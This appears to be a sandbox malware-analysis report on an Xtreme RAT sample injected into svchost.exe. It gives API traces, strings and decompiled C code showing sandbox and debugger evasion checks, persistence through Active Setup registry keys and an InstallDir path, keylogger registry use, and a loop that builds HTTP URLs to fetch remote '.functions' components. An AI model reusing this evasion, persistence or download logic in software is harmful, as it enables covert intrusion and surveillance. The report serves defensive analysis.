TerminateProcess.KERNEL32(000000DC,00000000,00000000,00000000,00000000,DSma9HnKa,000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000), ref: 00C8A5D5

Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(user32.dll), ref: 00C88BE5
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(urlmon.dll), ref: 00C88BEF
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(wininet.dll), ref: 00C88BF9
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C88C03
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(Shell32.dll), ref: 00C88C0D
Part of subcall function 00C88BC0: GetLastError.KERNEL32(00000000,00000000,?,Shell32.dll,advapi32.dll,wininet.dll,urlmon.dll,user32.dll,00000000,00C88E3F,?,00000000,00000001,00000000,00000000,00000000), ref: 00C88C25
Part of subcall function 00C88BC0: ExitProcess.KERNEL32(00000000,00000000,00000000,?,Shell32.dll,advapi32.dll,wininet.dll,urlmon.dll,user32.dll,00000000,00C88E3F,?,00000000,00000001,00000000,00000000), ref: 00C88C33
Part of subcall function 00C88BC0: Sleep.KERNEL32(0000000A,00000000), ref: 00C88DBC
Part of subcall function 00C88BC0: CloseHandle.KERNEL32(?), ref: 00C88DD4
Part of subcall function 00C88BC0: CloseHandle.KERNEL32(?), ref: 00C88DDD
Part of subcall function 00C88BC0: ExitProcess.KERNEL32(00000000,?,?,0000000A,00000000), ref: 00C88DFF
Part of subcall function 00C88BC0: ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00C88E18
Part of subcall function 00C88BC0: ExitProcess.KERNEL32(00000000,00000000,open,?,00000000,00000000,00000000,?,?,0000000A,00000000), ref: 00C88E1F

Sleep.KERNEL32(000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000,00000000), ref: 00C8A522
TerminateProcess.KERNEL32(000000DC,00000000,000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000), ref: 00C8A53E
GetLastError.KERNEL32(00000000,00000000,DSma9HnKa,000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C), ref: 00C8A568
CloseHandle.KERNEL32(00000000), ref: 00C8A576
TerminateProcess.KERNEL32(000000DC,00000000,00000000,00000000,00000000,DSma9HnKa,000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000), ref: 00C8A58D
ShellExecuteW.SHELL32(00000000,open,00C30000,00000000,00000000,00000000), ref: 00C8A600

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Part of subcall function 00C87B84: SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00C87D2A,?,00000000,00000000), ref: 00C87C1D
Part of subcall function 00C87B84: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C87C37
Part of subcall function 00C87B84: GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000080,00000000,00C87D2A,?,00000000,00000000), ref: 00C87C4A
Part of subcall function 00C87B84: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000080,00000000), ref: 00C87C6C
Part of subcall function 00C87B84: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00001000,00000040,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000), ref: 00C87C7D
Part of subcall function 00C87B84: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00C87C95
Part of subcall function 00C87B84: DeleteFileW.KERNEL32(00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00001000,00000040,00000000,00000000,00000000,80000000,00000001), ref: 00C87CEE
Part of subcall function 00C87B84: CloseHandle.KERNEL32(00000000), ref: 00C87D0F

Part of subcall function 00C83420: VirtualAlloc.KERNEL32(00000000,00000104,00001000,00000004,00000000,00C83498,?,?,?,?,?,00C89C1F,00000064,00008007,00000000,00C8A62B), ref: 00C83450
Part of subcall function 00C83420: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00000104,00001000,00000004,00000000,00C83498,?,?,?,?,?,00C89C1F,00000064), ref: 00C83463
Part of subcall function 00C83420: GetCommandLineW.KERNEL32(00000000,00C83498,?,?,?,?,?,00C89C1F,00000064,00008007,00000000,00C8A62B), ref: 00C8346A

Part of subcall function 00C83A54: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C83A65
Part of subcall function 00C83A54: Process32FirstW.KERNEL32(00000000,?), ref: 00C83A7A
Part of subcall function 00C83A54: CharUpperW.USER32(01970000), ref: 00C83A94
Part of subcall function 00C83A54: CharUpperW.USER32(00000000), ref: 00C83AA4
Part of subcall function 00C83A54: CharUpperW.USER32(01970000), ref: 00C83ABF
Part of subcall function 00C83A54: CharUpperW.USER32(?), ref: 00C83ACA
Part of subcall function 00C83A54: Process32NextW.KERNEL32(00000000,?), ref: 00C83AEC
Part of subcall function 00C83A54: CloseHandle.KERNEL32(00000000), ref: 00C83AF6

Strings

DSma9HnKaPERSIST, xrefs: 00C8A16F
svchost.exe, xrefs: 00C8A196
DSma9HnKa, xrefs: 00C8A0C8
C:\Users\user\AppData\Roaming\Microsoft\Windows\DSma9HnKa.cfg, xrefs: 00C8A3A6
{K5VVB854-OYR7-D8JQ-5HC0-X32C3UKV4ROA}, xrefs: 00C8A117
C:\Windows\InstallDir\Server.exe, xrefs: 00C8A107
XTREME, xrefs: 00C8A42F
.xtr, xrefs: 00C8A3C2
svchost.exe, xrefs: 00C8A1A5, 00C8A1C2, 00C8A1D7, 00C8A40F, 00C8A420
Mutex, xrefs: 00C8A489
InstalledServer, xrefs: 00C8A0D9
%DEFAULTBROWSER%, xrefs: 00C8A208
C:\Windows\InstallDir\, xrefs: 00C8A156
local, xrefs: 00C8A3EF
DSma9HnKa, xrefs: 00C8A3B0, 00C8A44B
explorer.exe, xrefs: 00C8A383
SOFTWARE\, xrefs: 00C8A0CD
Software\Microsoft\Active Setup\Installed Components\, xrefs: 00C8A11C
SOFTWARE\, xrefs: 00C8A472
Software\Microsoft\Active Setup\Installed Components\{K5VVB854-OYR7-D8JQ-5HC0-X32C3UKV4ROA}, xrefs: 00C8A133

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C88918, Relevance: 43.7, APIs: 29, Instructions: 200

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E00C88918(void* __edx, void* __edi, intOrPtr _a4) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t15;
				long _t17;
				intOrPtr _t48;
				void* _t52;
				long _t53;
				intOrPtr* _t54;

				_t52 = __edi;
				_t48 = _a4;
				if( *((char*)(_t48 + 0x1541)) == 1) {
					_t15 = E00C882DC();
					if(_t15 == 1) {
						ExitProcess(0);
					}
				}
				if( *((char*)(_t48 + 0x1542)) == 1) {
					_t15 = L00C88158(_t48, _t53);
					if(_t15 == 1) {
						ExitProcess(0);
					}
				}
				if( *((char*)(_t48 + 0x1543)) == 1) {
					_t15 = E00C88114();
					if(_t15 == 1) {
						ExitProcess(0);
					}
				}
				_t61 =  *((char*)(_t48 + 0x1544)) - 1;
				if( *((char*)(_t48 + 0x1544)) == 1) {
					_t15 = E00C881BC(_t48, _t52, _t53, _t61);
					if(_t15 == 1) {
						ExitProcess(0);
					}
				}
				if( *((char*)(_t48 + 0x1545)) == 1) {
					_t15 = E00C88300();
					if(_t15 == 1) {
						ExitProcess(0);
					}
				}
				if( *((char*)(_t48 + 0x1546)) == 1) {
					_t15 = E00C88494();
					if(_t15 == 1) {
						ExitProcess(0);
					}
				}
				if( *((char*)(_t48 + 0x1547)) == 1) {
					_t15 = E00C883DC();
					if(_t15 == 1) {
						ExitProcess(0);
					}
				}
				if( *((char*)(_t48 + 0x1548)) == 1) {
					_t15 = E00C88324();
					if(_t15 == 1) {
						ExitProcess(0);
					}
				}
				_t71 =  *((char*)(_t48 + 0x1549)) - 1;
				if( *((char*)(_t48 + 0x1549)) == 1) {
					_t15 = E00C8854C(_t48, _t52, _t53, _t71);
					if(_t15 == 1) {
						ExitProcess(0);
					}
				}
				if( *((char*)(_t48 + 0x154a)) == 1) {
					_t15 = E00C8887C();
					if(_t15 == 1) {
						ExitProcess(0);
					}
				}
				if( *((char*)(_t48 + 0x154b)) == 1) {
					_t15 = E00C886B0();
					if(_t15 == 1) {
						ExitProcess(0);
					}
				}
				if( *((char*)(_t48 + 0x154c)) == 1) {
					_t53 = GetTickCount();
					if(E00C88740(L00C88158) != 0) {
						ExitProcess(0);
					}
					if(E00C88740(E00C881BC) != 0) {
						ExitProcess(0);
					}
					if(E00C88740(E00C882DC) != 0) {
						ExitProcess(0);
					}
					if(E00C88740(E00C88300) != 0) {
						ExitProcess(0);
					}
					if(E00C88740(E00C88324) != 0) {
						ExitProcess(0);
					}
					if(E00C88740(E00C883DC) != 0) {
						ExitProcess(0);
					}
					if(E00C88740(E00C88494) != 0) {
						ExitProcess(0);
					}
					if(E00C88740(E00C8854C) != 0) {
						ExitProcess(0);
					}
					if(E00C88740(E00C886CC) != 0) {
						ExitProcess(0);
					}
					if(E00C88740(E00C88760) != 0) {
						ExitProcess(0);
					}
					if(E00C88740(E00C887A4) != 0) {
						ExitProcess(0);
					}
					if(E00C88740(E00C8887C) != 0) {
						ExitProcess(0);
					}
					if(E00C88740(E00C886B0) != 0) {
						ExitProcess(0);
					}
					if(E00C88740(E00C88114) != 0) {
						ExitProcess(0);
					}
					_t15 = E00C886CC(_t48);
					if(_t15 == 1) {
						ExitProcess(0);
					}
				}
				if( *((char*)(_t48 + 0x154c)) != 1) {
					L70:
					return _t15;
				} else {
					E00C88760();
					_t17 = GetTickCount();
					_push(0);
					asm("cdq");
					 *_t54 =  *_t54 - _t53;
					asm("sbb [esp+0x4], edx");
					_t15 = _t17;
					if(0 != 0) {
						if(0 <= 0) {
							goto L70;
						}
						L69:
						ExitProcess(0);
						return _t15;
					}
					if(_t15 <= 0x1388) {
						goto L70;
					} else {
						goto L69;
					}
				}
			}

APIs

ExitProcess.KERNEL32(00000000), ref: 00C88934
ExitProcess.KERNEL32(00000000), ref: 00C8894D
ExitProcess.KERNEL32(00000000), ref: 00C88966
ExitProcess.KERNEL32(00000000), ref: 00C8897F
ExitProcess.KERNEL32(00000000), ref: 00C88998
ExitProcess.KERNEL32(00000000), ref: 00C889B1
ExitProcess.KERNEL32(00000000), ref: 00C889CA
ExitProcess.KERNEL32(00000000), ref: 00C889E3
ExitProcess.KERNEL32(00000000), ref: 00C889FC
ExitProcess.KERNEL32(00000000), ref: 00C88A15
ExitProcess.KERNEL32(00000000), ref: 00C88A2E
GetTickCount.KERNEL32(00000000), ref: 00C88A40
ExitProcess.KERNEL32(00000000), ref: 00C88A57
ExitProcess.KERNEL32(00000000), ref: 00C88A6C
ExitProcess.KERNEL32(00000000), ref: 00C88A81
ExitProcess.KERNEL32(00000000), ref: 00C88B78

Part of subcall function 00C88300: GetModuleHandleA.KERNEL32(dbghelp.dll,?,00C88992), ref: 00C88308

Part of subcall function 00C881BC: CloseHandle.KERNEL32(00000000), ref: 00C88272
Part of subcall function 00C881BC: CloseHandle.KERNEL32(00000000), ref: 00C88291

ExitProcess.KERNEL32(00000000), ref: 00C88A96
ExitProcess.KERNEL32(00000000), ref: 00C88AAB
GetTickCount.KERNEL32(00000000), ref: 00C88B8B

Part of subcall function 00C883DC: RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C883F4
Part of subcall function 00C883DC: RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C8841D
Part of subcall function 00C883DC: RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C88433

Part of subcall function 00C88494: RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C884AC
Part of subcall function 00C88494: RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C884D5
Part of subcall function 00C88494: RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C884EB

ExitProcess.KERNEL32(00000000), ref: 00C88AC0
ExitProcess.KERNEL32(00000000), ref: 00C88AD5
ExitProcess.KERNEL32(00000000), ref: 00C88BB2

Part of subcall function 00C8854C: GetUserNameA.ADVAPI32(00000000,?), ref: 00C88593

Part of subcall function 00C88324: RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C8833C
Part of subcall function 00C88324: RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C88365
Part of subcall function 00C88324: RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C8837B

ExitProcess.KERNEL32(00000000), ref: 00C88AEA
ExitProcess.KERNEL32(00000000), ref: 00C88AFF
ExitProcess.KERNEL32(00000000), ref: 00C88B14
ExitProcess.KERNEL32(00000000), ref: 00C88B29
ExitProcess.KERNEL32(00000000), ref: 00C88B3E
ExitProcess.KERNEL32(00000000), ref: 00C88B53
ExitProcess.KERNEL32(00000000), ref: 00C88B68

Part of subcall function 00C882DC: GetModuleHandleA.KERNEL32(SbieDll.dll,?,00C8892E), ref: 00C882E4

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C88BC0, Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 182
librarysleep

C-Code - Quality: 46%

			E00C88BC0(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				long _t47;
				char* _t48;
				intOrPtr _t50;
				intOrPtr _t53;
				intOrPtr* _t54;
				intOrPtr _t56;
				intOrPtr _t59;
				intOrPtr* _t60;
				intOrPtr _t62;
				void* _t63;
				char* _t69;
				char* _t72;
				intOrPtr* _t79;
				intOrPtr* _t82;
				void* _t105;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr* _t120;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr _t134;
				intOrPtr _t141;
				signed int _t144;
				intOrPtr _t147;

				_t146 = _t147;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t105 = _a4;
				_push(_t147);
				_push(0xc88e3f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t147;
				LoadLibraryA("user32.dll");
				LoadLibraryA("urlmon.dll");
				LoadLibraryA("wininet.dll");
				LoadLibraryA("advapi32.dll");
				LoadLibraryA("Shell32.dll");
				_v8 = E00C8263C(0, 0, _t105 + 0x1310);
				_t47 = GetLastError();
				_t150 = _t47 - 0xb7;
				if(_t47 == 0xb7) {
					ExitProcess(0);
				}
				_t48 =  *0xc8b0f8; // 0xc8e014
				 *_t48 =  *((intOrPtr*)(_t105 + 0x1818));
				_t50 = E00C833A8(_t105 + 0x1618, 0xc88e90, _t150);
				_t116 =  *0xc8b100; // 0xc8e018
				 *_t116 = _t50;
				_t53 = E00C833A8(E00C836D8(_t105 + 0x1c30, _t150), _t105 + 0x1310, _t150);
				_t118 =  *0xc8b0f0; // 0xc8e01c
				 *_t118 = _t53;
				_t54 =  *0xc8b0f0; // 0xc8e01c
				_t56 = E00C833A8( *_t54, L".xtr", _t150);
				_t120 =  *0xc8b0f0; // 0xc8e01c
				 *_t120 = _t56;
				_t59 = E00C833A8(E00C836D8(_t105 + 0x1c30, _t150), _t105 + 0x1310, _t150);
				_t122 =  *0xc8b0f4; // 0xc8dec8
				 *_t122 = _t59;
				_t60 =  *0xc8b0f4; // 0xc8dec8
				_t62 = E00C833A8( *_t60, L".dat", _t150);
				_t124 =  *0xc8b0f4; // 0xc8dec8
				 *_t124 = _t62;
				_t63 =  *0xc8b0ec; // 0xc8c6ac
				_t143 = _t105;
				memcpy(_t63, _t105, 0x607 << 2);
				if( *((char*)(_t105 + 0x139c)) == 1) {
					E00C87744(_t143, _t146);
				}
				_t144 = 0;
				_t141 =  *0xc8b0fc; // 0xc8e000
				do {
					E00C81B78( &_v16);
					if( *((intOrPtr*)(_t105 + _t144 * 4)) > 0) {
						E00C81CD8( &_v20, 0x29, _t105 + 0x14 + _t144 * 0x29 * 2);
						E00C81DBC(_v20, 0);
						if(0 != 0) {
							_push(L"http://");
							_t130 = _t105 + 0x14 + _t144 * 0x29 * 2;
							E00C81CD8( &_v24, 0x29, _t105 + 0x14 + _t144 * 0x29 * 2);
							_push(_v24);
							_push(E00C88EC4);
							asm("cdq");
							E00C82E14( &_v28, 0x29, _t105 + 0x14 + _t144 * 0x29 * 2,  *((intOrPtr*)(_t105 + _t144 * 4)), _t130);
							_push(_v28);
							_push(E00C88ECC);
							E00C82E14( &_v32, 0x29, 0,  *((intOrPtr*)(_t105 + 0x11b4)), 0);
							_push(_v32);
							_push(L".functions");
							E00C81D74();
						}
					}
					E00C81DBC(_v16, 0);
					if(0 != 0) {
						E00C81BB4(_t141, _v16);
					}
					_t144 = _t144 + 1;
					_t141 = _t141 + 4;
				} while (_t144 != 5);
				_t69 =  *0xc8b104; // 0xc8b0d0
				 *_t69 = 0;
				E00C8384C(E00C87D60, 0, 0);
				while(1) {
					_t72 =  *0xc8b104; // 0xc8b0d0
					if( *_t72 != 0) {
						break;
					}
					Sleep(0xa);
					E00C83838();
				}
				CloseHandle(_v8);
				CloseHandle(_v12);
				E00C8684C();
				_t79 =  *0xc8b0f0; // 0xc8e01c
				E00C83674( *_t79);
				_t82 =  *0xc8b0e8; // 0xc8e020
				if( *_t82 == 0) {
					ExitProcess(0);
				}
				ShellExecuteW(0, L"open", _t105 + 0x181c, 0, 0, 0);
				ExitProcess(0);
				_pop(_t134);
				 *[fs:eax] = _t134;
				_push(E00C88E46);
				return E00C81B90( &_v32, 5);
			}

APIs

LoadLibraryA.KERNEL32(user32.dll), ref: 00C88BE5
LoadLibraryA.KERNEL32(urlmon.dll), ref: 00C88BEF
LoadLibraryA.KERNEL32(wininet.dll), ref: 00C88BF9
LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C88C03
LoadLibraryA.KERNEL32(Shell32.dll), ref: 00C88C0D

Part of subcall function 00C8263C: CreateMutexW.KERNEL32(?,?,?,?,00C89C68,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C82652

GetLastError.KERNEL32(00000000,00000000,?,Shell32.dll,advapi32.dll,wininet.dll,urlmon.dll,user32.dll,00000000,00C88E3F,?,00000000,00000001,00000000,00000000,00000000), ref: 00C88C25
ExitProcess.KERNEL32(00000000,00000000,00000000,?,Shell32.dll,advapi32.dll,wininet.dll,urlmon.dll,user32.dll,00000000,00C88E3F,?,00000000,00000001,00000000,00000000), ref: 00C88C33

Part of subcall function 00C833A8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

Part of subcall function 00C836D8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,00000000,00C8A149,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C83721
Part of subcall function 00C836D8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,00000000,00C8A149,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C83775

Part of subcall function 00C81B78: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C8384C: CreateThread.KERNEL32(00000000,00000000,00C87D60,00000000,?,?), ref: 00C83862
Part of subcall function 00C8384C: SetThreadPriority.KERNEL32(00000000,00000000,00000001,?,00000000,?,00C88DB8,00000000), ref: 00C8386B

Sleep.KERNEL32(0000000A,00000000), ref: 00C88DBC
CloseHandle.KERNEL32(?), ref: 00C88DD4
CloseHandle.KERNEL32(?), ref: 00C88DDD

Part of subcall function 00C8684C: SendMessageA.USER32(00000000,0000C1F2,00000000,00000000), ref: 00C86865
Part of subcall function 00C8684C: CloseHandle.KERNEL32(00000000), ref: 00C86879

Part of subcall function 00C83674: GetFileAttributesW.KERNEL32(00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C83678
Part of subcall function 00C83674: SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000), ref: 00C83688

ExitProcess.KERNEL32(00000000,?,?,0000000A,00000000), ref: 00C88DFF
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00C88E18
ExitProcess.KERNEL32(00000000,00000000,open,?,00000000,00000000,00000000,?,?,0000000A,00000000), ref: 00C88E1F

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Part of subcall function 00C87744: ShowWindow.USER32(00000000,00000000), ref: 00C8777B
Part of subcall function 00C87744: SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00C8778B
Part of subcall function 00C87744: CreateFileW.KERNEL32(00000000,C0000000,00000003,00000000,00000004,00000000,00000000), ref: 00C877A5
Part of subcall function 00C87744: GetFileSize.KERNEL32(00000000,00000000,00000000,C0000000,00000003,00000000,00000004,00000000,00000000,00000000,00000080), ref: 00C877C4
Part of subcall function 00C87744: SetFileAttributesW.KERNEL32(00000000,00000007,00000000,00000000,00000000,C0000000,00000003,00000000,00000004,00000000,00000000,00000000,00000080), ref: 00C8781C
Part of subcall function 00C87744: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000007,00000000,00000000,00000000,C0000000,00000003,00000000,00000004,00000000,00000000,00000000), ref: 00C8782D
Part of subcall function 00C87744: SendMessageA.USER32(00000000,0000C1F3,00000000,00000000), ref: 00C87888
Part of subcall function 00C87744: SetClipboardViewer.USER32(00000000), ref: 00C87893

Strings

Shell32.dll, xrefs: 00C88C08
.dat, xrefs: 00C88CB2
advapi32.dll, xrefs: 00C88BFE
http://, xrefs: 00C88D1F
.functions, xrefs: 00C88D6B
user32.dll, xrefs: 00C88BE0
wininet.dll, xrefs: 00C88BF4
.xtr, xrefs: 00C88C7B
open, xrefs: 00C88E11
urlmon.dll, xrefs: 00C88BEA

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C873E0, Relevance: 21.2, APIs: 14, Instructions: 177
windowfile

C-Code - Quality: 98%

			E00C873E0(void* __eax, WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v9;
				void _v16;
				long _v24;
				long _v28;
				long _v32;
				long _v40;
				long _v44;
				char _v45;
				void _v46;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t43;
				long _t45;
				long _t46;
				long _t47;
				int _t48;
				struct HWND__* _t49;
				long _t51;
				void* _t52;
				void* _t59;
				void* _t61;
				int _t63;
				struct HWND__* _t64;
				WCHAR* _t92;
				long _t99;
				long _t100;
				void* _t103;
				void* _t104;
				long _t105;
				void* _t107;

				_t92 = __ecx;
				_v8 = __edx;
				_t103 = __eax;
				_v9 = 0;
				if( *0xc8dee8 == 0xffffffff) {
					L23:
					return _v9;
				}
				_v44 = 0;
				_v40 = 0;
				_t43 =  *0xc8dee8; // 0x0
				_v28 = GetFileSize(_t43, 0);
				_v24 = 0;
				if(_v24 != 0) {
					if(__eflags <= 0) {
						L6:
						if(_v40 != 0) {
							if(__eflags <= 0) {
								goto L23;
							}
							L10:
							_t45 = E00C852E8(_t92);
							asm("cdq");
							 *0xc8b0c8 = _t45;
							 *0xc8b0cc = 0;
							_t46 =  *0xc8b0c8; // 0x0
							_t99 =  *0xc8b0cc; // 0x0
							__eflags = _t99 - _v40;
							if(__eflags != 0) {
								if(__eflags <= 0) {
									L15:
									_t47 =  *0xc8b0c8; // 0x0
									_t100 =  *0xc8b0cc; // 0x0
									__eflags = _t100 - _v40;
									if(_t100 != _v40) {
										L17:
										__eflags =  *0xc8b0b4;
										if( *0xc8b0b4 != 0) {
											_t48 =  *0xc8ded0; // 0xc1f2
											_t49 =  *0xc8b0b4; // 0x0
											SendMessageA(_t49, _t48, 0, 0);
											_t51 =  *0xc8b0c8; // 0x0
											_t52 =  *0xc8dee8; // 0x0
											SetFilePointer(_t52, _t51, 0, 0);
											_t105 = _v44;
											_v16 = VirtualAlloc(0, _t105 -  *0xc8b0c8, 0x1000, 4);
											_t59 =  *0xc8dee8; // 0x0
											ReadFile(_t59, _v16, _t105 -  *0xc8b0c8,  &_v32, 0);
											_t61 =  *0xc8dee8; // 0x0
											SetFilePointer(_t61, 0, 0, 2);
											_t63 =  *0xc8ded4; // 0xc1f3
											_t64 =  *0xc8b0b4; // 0x0
											SendMessageA(_t64, _t63, 0, 0);
											SetFileAttributesW(_t92, 0x80);
											DeleteFileW(_t92);
											_t107 = CreateFileW(_t92, 0x40000000, 0, 0, 2, 0, 0);
											__eflags = _t107 - 0xffffffff;
											if(_t107 != 0xffffffff) {
												_v46 = 0xff;
												_v45 = 0xfe;
												WriteFile(_t107,  &_v46, 2,  &_v32, 0);
												__eflags = _v44 -  *0xc8b0c8;
												E00C85084(_t107, _v44 -  *0xc8b0c8, _v16, 0,  &_v32);
												VirtualFree( &_v16, 0, 0x8000);
											}
											CloseHandle(_t107);
											_v9 = E00C87918(_t103, _t92, _v8, _a4, _a8, _a12);
											__eflags = _v9 - 1;
											if(_v9 == 1) {
												 *0xc8b0c8 = _v44;
												 *0xc8b0cc = _v40;
												E00C853EC(_v44, _t92, _t107);
											}
											DeleteFileW(_t92);
										}
										goto L23;
									}
									__eflags = _t47 - _v44;
									if(_t47 == _v44) {
										goto L23;
									}
									goto L17;
								}
								L14:
								 *0xc8b0c8 = 0;
								 *0xc8b0cc = 0;
								E00C853EC(0, _t92, _t104);
								goto L17;
							}
							__eflags = _t46 - _v44;
							if(_t46 <= _v44) {
								goto L15;
							}
							goto L14;
						}
						if(_v44 > 0) {
							goto L10;
						}
						goto L23;
					}
					L5:
					_v44 = _v28;
					_v40 = _v24;
					goto L6;
				}
				if(_v28 <= 0) {
					goto L6;
				}
				goto L5;
			}

APIs

GetFileSize.KERNEL32(00000000,00000000), ref: 00C87417

Part of subcall function 00C852E8: RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00020019,?,00C853D4,?,SOFTWARE\,00000000,00C853AA,?,XtremeKeylogger), ref: 00C8534C
Part of subcall function 00C852E8: RegQueryValueExW.ADVAPI32(?,LastSize,00000000,?,?,?,80000001,00000000,00000000,00020019,?,00C853D4,?,SOFTWARE\,00000000,00C853AA), ref: 00C8537A
Part of subcall function 00C852E8: RegCloseKey.ADVAPI32(?,?,LastSize,00000000,?,?,?,80000001,00000000,00000000,00020019,?,00C853D4,?,SOFTWARE\,00000000), ref: 00C8538A

SendMessageA.USER32(00000000,0000C1F2,00000000,00000000), ref: 00C874D7
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,0000C1F2,00000000,00000000,00000000,00000000), ref: 00C874EC
VirtualAlloc.KERNEL32(00000000,-00C8B0C8,00001000,00000004,00000000,00000000,00000000,00000000,00000000,0000C1F2,00000000,00000000,00000000,00000000), ref: 00C87506
ReadFile.KERNEL32(00000000,?,-00C8B0C8,?,00000000), ref: 00C87525
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00000000,?,-00C8B0C8,?,00000000,00000000,-00C8B0C8,00001000,00000004,00000000,00000000,00000000), ref: 00C87536
SendMessageA.USER32(00000000,0000C1F3,00000000,00000000), ref: 00C8754B
SetFileAttributesW.KERNEL32(?,00000080,00000000,0000C1F3,00000000,00000000,00000000,00000000,00000000,00000002,00000000,?,-00C8B0C8,?,00000000,00000000), ref: 00C87556
DeleteFileW.KERNEL32(?,?,00000080,00000000,0000C1F3,00000000,00000000,00000000,00000000,00000000,00000002,00000000,?,-00C8B0C8,?,00000000), ref: 00C8755C
